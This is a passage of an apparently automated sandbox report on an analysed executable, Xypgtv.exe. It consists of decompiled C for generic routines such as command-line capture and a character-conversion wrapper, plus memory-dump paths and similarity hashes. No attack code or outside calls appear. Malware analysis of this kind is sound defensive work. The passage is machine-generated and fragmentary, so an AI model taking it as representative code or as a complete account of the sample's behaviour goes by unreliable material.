                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: Init_thread_footer__onexit
                                            • String ID: 'F$'F
                                            • API String ID: 1881088180-916474014
                                            • Opcode ID: d27bddbb5d81040d3eaee13cf3ae7456d2518aa173b76e2fda17a51764dac976
                                            • Instruction ID: a17f43055c61789327a22ceb58f5d8867b7d967306591e7a6e765c9b759ffbc0
                                            • Opcode Fuzzy Hash: d27bddbb5d81040d3eaee13cf3ae7456d2518aa173b76e2fda17a51764dac976
                                            • Instruction Fuzzy Hash: EAE0DF71206A21ABC614F728AA82D8C7380EB05329B60013FF044A72D19FBC6801957F
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0043CD7A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0043CD7A() {

				 *0x460960 = GetCommandLineA();
				 *0x460964 = GetCommandLineW();
				return 1;
			}



                                            0x0043cd80
                                            0x0043cd8b
                                            0x0043cd92

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: CommandLine
                                            • String ID: @5G
                                            • API String ID: 3253501508-3310502487
                                            • Opcode ID: 18c3806ff94968a6b0280554c24f706f01880c89ff3fda9b544b37b8176fb915
                                            • Instruction ID: 8c17e9a4d6aaecdd282574a172dd89c9e676431d00bff78cf19032dfc9b3707c
                                            • Opcode Fuzzy Hash: 18c3806ff94968a6b0280554c24f706f01880c89ff3fda9b544b37b8176fb915
                                            • Instruction Fuzzy Hash: 55B092BC9123018FF7008F70B91D0073BE1B28D3023800075D401D2332E7740408EF09
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004407AB, Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E004407AB(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E0042F367(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E00432914())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t25 = _t70 + 1; // 0x1
							_t56 = _t25;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E00432914())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E00439E69(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E00432914())) = 0x16;
					return E00430C7A() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























                                            0x004407ab
                                            0x004407b4
                                            0x004407b9
                                            0x004407bc
                                            0x004407c0
                                            0x004407cf
                                            0x004407d2
                                            0x004407f2
                                            0x004407f7
                                            0x004407fa
                                            0x004407fc
                                            0x004408ca
                                            0x004408d0
                                            0x004408e5
                                            0x004408f1
                                            0x004408f7
                                            0x004408f9
                                            0x00440908
                                            0x00440908
                                            0x00440908
                                            0x0044090b
                                            0x0044090b
                                            0x0044090f
                                            0x00440911
                                            0x00440914
                                            0x00440914
                                            0x00440914
                                            0x00440914
                                            0x00000000
                                            0x0044091b
                                            0x00440900
                                            0x00000000
                                            0x00440900
                                            0x004408d2
                                            0x004408d5
                                            0x004408d5
                                            0x004408d8
                                            0x004408d8
                                            0x004408da
                                            0x004408db
                                            0x004408db
                                            0x004408df
                                            0x00000000
                                            0x004408df
                                            0x00440802
                                            0x00440808
                                            0x00440835
                                            0x00440841
                                            0x00440847
                                            0x00440849
                                            0x00000000
                                            0x00000000
                                            0x0044084f
                                            0x00440855
                                            0x00440858
                                            0x004408b4
                                            0x004408b9
                                            0x004408c1
                                            0x00000000
                                            0x004408c1
                                            0x0044085a
                                            0x0044085d
                                            0x0044085f
                                            0x00440862
                                            0x00440864
                                            0x00440866
                                            0x0044089c
                                            0x004408aa
                                            0x004408b0
                                            0x004408b2
                                            0x004408c6
                                            0x00000000
                                            0x004408c6
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00440868
                                            0x00440868
                                            0x00440868
                                            0x0044086b
                                            0x0044086e
                                            0x00440870
                                            0x00000000
                                            0x00000000
                                            0x0044087a
                                            0x00440881
                                            0x00440884
                                            0x00440886
                                            0x0044088e
                                            0x0044088e
                                            0x00440891
                                            0x00440892
                                            0x00440895
                                            0x00440897
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00440897
                                            0x00440888
                                            0x00440889
                                            0x0044088c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0044088c
                                            0x00440899
                                            0x00000000
                                            0x00440899
                                            0x0044080a
                                            0x0044080c
                                            0x00000000
                                            0x00000000
                                            0x00440812
                                            0x00440815
                                            0x00440819
                                            0x0044081c
                                            0x00440820
                                            0x00000000
                                            0x00000000
                                            0x00440826
                                            0x00440827
                                            0x0044082a
                                            0x0044082c
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0044082e
                                            0x00000000
                                            0x00440815
                                            0x004407d9
                                            0x00000000
                                            0x004407e4
                                            0x004407c6
                                            0x004407cc
                                            0x00000000
                                            0x004407cc
                                            0x00440923

                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00440841
                                            • GetLastError.KERNEL32(?,?), ref: 0044084F
                                            • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?), ref: 004408AA
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.912203016.0000000000401000.00000020.00000001.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000002.00000002.912191905.0000000000400000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912239074.0000000000449000.00000002.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912258452.000000000045F000.00000004.00000001.sdmp Download File
                                            • Associated: 00000002.00000002.912271649.0000000000464000.00000002.00000001.sdmp Download File
                                            Yara matches
                                            Similarity
                                            • API ID: ByteCharMultiWide$ErrorLast
                                            • String ID:
                                            • API String ID: 1717984340-0
                                            • Opcode ID: efa259cec8726a2f801e829e5e5724e813016fb73881d41a178c1de01fdc389f
                                            • Instruction ID: fb3383396eb9260d24903b742a35b7b0ffc4b69179bde468b535b3af6be65837
                                            • Opcode Fuzzy Hash: efa259cec8726a2f801e829e5e5724e813016fb73881d41a178c1de01fdc389f
                                            • Instruction Fuzzy Hash: DC41297060024AEFFF219F65C844BBB7BB4EF01310F14416AFA55AB2A1D7348D21CB99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: Xypgtv.exe PID: 6740 Parent PID: 3424 Xypgtv.exeCOMMON

                                            Executed Functions

                                            Non-executed Functions

                                            Function 02224000, Relevance: 5.1, Strings: 4, Instructions: 69COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000003.710149364.0000000002224000.00000004.00000001.sdmp, Offset: 02224000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: VA$UA$UA$UA
                                            • API String ID: 0-2026754805
                                            • Opcode ID: fd9dfbfb362c70c15eb7dd88d61da2dbc6798bcc93667297291fafeaa6fbfc2e
                                            • Instruction ID: 7e412c5f08bf9311efc90409e14e56ef55a0d5e51e31f5c53ab076f9c6ce61ad
                                            • Opcode Fuzzy Hash: fd9dfbfb362c70c15eb7dd88d61da2dbc6798bcc93667297291fafeaa6fbfc2e
                                            • Instruction Fuzzy Hash: FF2165B4A14B11FFDB14EBE8D844BDCBBE6E748310F1084A6E40097298C77E9984CF18
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Analysis Process: Xypgtv.exe PID: 7004 Parent PID: 3424 Xypgtv.exeCOMMON

                                            Executed Functions

                                            Non-executed Functions

                                            Function 02284000, Relevance: 5.1, Strings: 4, Instructions: 69COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000003.732906431.0000000002284000.00000004.00000001.sdmp, Offset: 02284000, based on PE: false
                                            Similarity
                                            • API ID:
                                            • String ID: VA$UA$UA$UA
                                            • API String ID: 0-2026754805
                                            • Opcode ID: fd9dfbfb362c70c15eb7dd88d61da2dbc6798bcc93667297291fafeaa6fbfc2e
                                            • Instruction ID: e0d0867b4b8c4971926b12a669c5ce30138213f63daa932c59ff9e73e9f7bdc3
                                            • Opcode Fuzzy Hash: fd9dfbfb362c70c15eb7dd88d61da2dbc6798bcc93667297291fafeaa6fbfc2e
                                            • Instruction Fuzzy Hash: EA212CB4A25B45EFD714FBE8D845BDDBBE6E788710F2084A6E400972D8C678D980CF18
                                            Uniqueness

                                            Uniqueness Score: -1.00%